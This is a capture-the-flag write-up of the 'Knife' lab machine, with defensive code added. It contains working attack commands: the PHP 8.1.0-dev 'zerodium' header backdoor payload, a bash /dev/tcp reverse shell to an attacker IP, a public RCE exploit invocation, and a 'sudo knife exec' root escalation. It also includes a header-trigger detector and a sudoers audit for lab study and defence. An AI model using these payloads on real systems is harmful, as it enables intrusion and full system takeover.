```bash
# TCP
nmap -vvv 10.10.10.242 -p- -sCV -oA knifeTCP
# UDP
nmap -vvv 10.10.10.242 -sU --top-ports 100 -oA knifeUDP
```
Starting with enumeration, we only find TCP 22 (SSH) and 80 (HTTP) open.
## HTTP 80
Now we fuzz for directories and pages:
```bash
dirsearch -u http://10.10.10.242/
```
This only returns 403 responses, so we fuzz for PHP pages instead:
```bash
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://10.10.10.242:80/FUZZ.php -ic
```
This only finds index.php, so I tried another wordlist called all_files.txt. For a reason I don't know, everything after index.php returns the content of index.php.
The server reports PHP 8.1.0 (the 8.1.0-dev build), a version that shipped with a backdoor. We can execute commands on the system through this backdoor using the following payload:

```php
zerodium system("command");
```
Now we can get a reverse shell with the same payload:

```php
zerodium system("bash -c '/bin/bash -i >& /dev/tcp/10.10.16.9/8000 0>&1'");
```
We could also use an available exploit:

```bash
git clone https://github.com/flast101/php-8.1.0-dev-backdoor-rce.git
cd php-8.1.0-dev-backdoor-rce
python3 revshell_php_8.1.0-dev.py <target URL> <attacker IP> <attacker PORT>
python3 revshell_php_8.1.0-dev.py http://10.10.10.242/ 10.10.16.9 8000
```
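From the defender's side, the useful property of this backdoor is that every trigger request carries a header value starting with the literal string `zerodium`, which no legitimate client sends. The following detector is an added example (not code from this writeup or from the exploit repository above): it parses a dump of request header blocks and flags any header whose value begins with that prefix, without depending on which header name the backdoor reads. The log format (one `Name: value` header per line, requests separated by blank lines) and the sample requests are constructed for the example.

```python
"""Flag HTTP requests whose headers carry the PHP 8.1.0-dev backdoor trigger.

The backdoor evaluates PHP that follows a header value beginning with
"zerodium". Matching on that prefix in every request header catches it
regardless of which header the backdoored build actually inspects.
"""
from __future__ import annotations

import re

# Matches "zerodium" at the start of a header value (case-insensitive, leading
# whitespace ignored) and captures the PHP that the backdoor would evaluate.
TRIGGER = re.compile(r"^\s*zerodium\b(.*)$", re.IGNORECASE | re.DOTALL)

# Constructed sample: three request header blocks as a reverse proxy or WAF
# might log them. Only the second one carries the trigger; the third mentions
# the word mid-value, which the backdoor does not act on.
SAMPLE_LOG = """\
Host: 10.10.10.242
User-Agent: Mozilla/5.0
Accept: */*

Host: 10.10.10.242
X-Constructed-Header: zerodium system("id");
Accept: */*

Host: 10.10.10.242
User-Agent: Mozilla/5.0 (zerodium research crawler)
"""


def parse_requests(raw: str) -> list[dict[str, str]]:
    """Split a blank-line-separated dump of header blocks into dicts.

    Assumption: each block is one request with one 'Name: value' per line.
    """
    requests: list[dict[str, str]] = []
    for block in re.split(r"\n\s*\n", raw.strip()):
        headers: dict[str, str] = {}
        for line in block.splitlines():
            name, sep, value = line.partition(":")
            if sep:
                headers[name.strip()] = value.strip()
        if headers:
            requests.append(headers)
    return requests


def find_backdoor_triggers(raw: str) -> list[tuple[int, str, str]]:
    """Return (request index, header name, captured PHP) for every hit."""
    hits: list[tuple[int, str, str]] = []
    for idx, headers in enumerate(parse_requests(raw)):
        for name, value in headers.items():
            match = TRIGGER.match(value)
            if match:
                hits.append((idx, name, match.group(1).strip()))
    return hits


if __name__ == "__main__":
    for idx, name, php in find_backdoor_triggers(SAMPLE_LOG):
        print(f"request {idx}: header {name!r} would execute: {php}")
```

Anchoring the match at the start of the value keeps false positives low (the word appearing inside a user agent string is not a trigger), and the captured PHP tells the responder what the attacker attempted before the web server was patched or rebuilt.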
## Upgrade Your Shell

```bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
# press ctrl + z to background the shell, then:
stty raw -echo;fg
```
## Privilege Escalation

We get the user flag, and we find we can run knife with sudo permissions:

```bash
sudo /usr/bin/knife exec -E 'exec "/bin/sh"'
```
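The root cause here is a sudoers rule that lets a low-privileged user run a binary which can evaluate code or spawn a shell. The audit below is an added example (not part of this writeup) that parses sudoers-style rules and reports any entry granting `ALL` or a shell-capable command such as `knife`; the embedded sudoers content is constructed, and the `SHELL_CAPABLE` list is an assumption to be extended for your own environment. On a real host you would feed it `/etc/sudoers` and the files under `/etc/sudoers.d/`.

```python
"""Audit sudoers rules for commands that can hand the caller a shell."""
from __future__ import annotations

import os
import re
from dataclasses import dataclass

# Binaries that evaluate code or drop to a shell when run under sudo.
# knife is listed because `knife exec` runs arbitrary Ruby, as above.
# Assumption: this set is a starting point, not an exhaustive list.
SHELL_CAPABLE = {
    "knife", "vim", "vi", "less", "more", "python", "python3",
    "perl", "ruby", "bash", "sh", "env", "find", "awk",
}

# user host = (runas) [TAG:] command, command ...
RULE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)

# Constructed sample; not the sudoers of the machine in this writeup.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
james   ALL=(ALL) NOPASSWD: /usr/bin/knife
backup  ALL=(root) /usr/bin/rsync, /usr/bin/systemctl restart nginx
"""


@dataclass
class Finding:
    user: str
    runas: str
    command: str
    nopasswd: bool
    reason: str


def audit_sudoers(text: str) -> list[Finding]:
    """Return one Finding per risky command specification."""
    findings: list[Finding] = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(
            ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")
        ):
            continue
        match = RULE.match(line)
        if not match:
            continue
        user = match.group("user")
        runas = match.group("runas") or "root"  # sudo's default target user
        nopasswd = False  # tags persist across the rest of the command list
        for spec in match.group("cmds").split(","):
            spec = spec.strip()
            # Strip leading tags such as NOPASSWD: / PASSWD: / SETENV:
            while ":" in spec and spec.split(":", 1)[0].isupper():
                tag, spec = spec.split(":", 1)
                spec = spec.strip()
                if tag == "NOPASSWD":
                    nopasswd = True
                elif tag == "PASSWD":
                    nopasswd = False
            if spec == "ALL":
                findings.append(Finding(user, runas, spec, nopasswd, "unrestricted ALL"))
                continue
            binary = os.path.basename(spec.split()[0])
            if binary in SHELL_CAPABLE:
                findings.append(
                    Finding(user, runas, spec, nopasswd, f"{binary} can spawn a shell")
                )
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        flag = "NOPASSWD" if f.nopasswd else "password"
        print(f"{f.user} -> ({f.runas}) {f.command} [{flag}]: {f.reason}")
```

The `backup` entry produces no finding because neither `rsync` nor a restricted `systemctl` invocation is in the shell-capable set, while the `james` rule is reported with `NOPASSWD`, which is exactly the combination that turned a web shell into root on this box.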